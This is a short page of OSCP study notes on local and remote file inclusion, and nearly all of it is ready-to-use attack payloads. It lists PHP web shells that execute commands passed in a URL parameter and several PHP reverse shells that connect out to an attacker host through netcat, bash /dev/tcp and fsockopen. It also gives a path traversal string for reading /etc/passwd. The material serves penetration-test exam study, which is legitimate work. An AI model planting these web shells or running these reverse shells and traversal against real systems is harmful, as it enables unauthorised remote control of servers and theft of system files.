> For the complete documentation index, see [llms.txt](https://abcsup.gitbook.io/oscp-study-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://abcsup.gitbook.io/oscp-study-notes/vulnerabilites-and-exploitation/lfi-rfi.md).

# LFI/RFI

Pentestmonkeys `/usr/share/webshells/php/php-reverse-shell.php`

```php
<?php echo shell_exec("nc $TARGET_IP -e /bin/sh") ?>
```

```php
<?php echo system($_GET["cmd"]);?>
<?php echo shell_exec($_GET["cmd"]);?>
```

### Reverse TCP shell without netcat

```php
<?php echo shell_exec('/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1');?>
```

```php
<?php $sock=fsockopen("127.0.0.1",1337); exec("/bin/sh -i <&3 >&3 2>&3");?>
```

```
../../../../../../../../../etc/passwd
```

## Notes

* Some versions of netcat does not support `-e` flag

## References

* <https://awakened1712.github.io/oscp/oscp-lfi-rfi/>
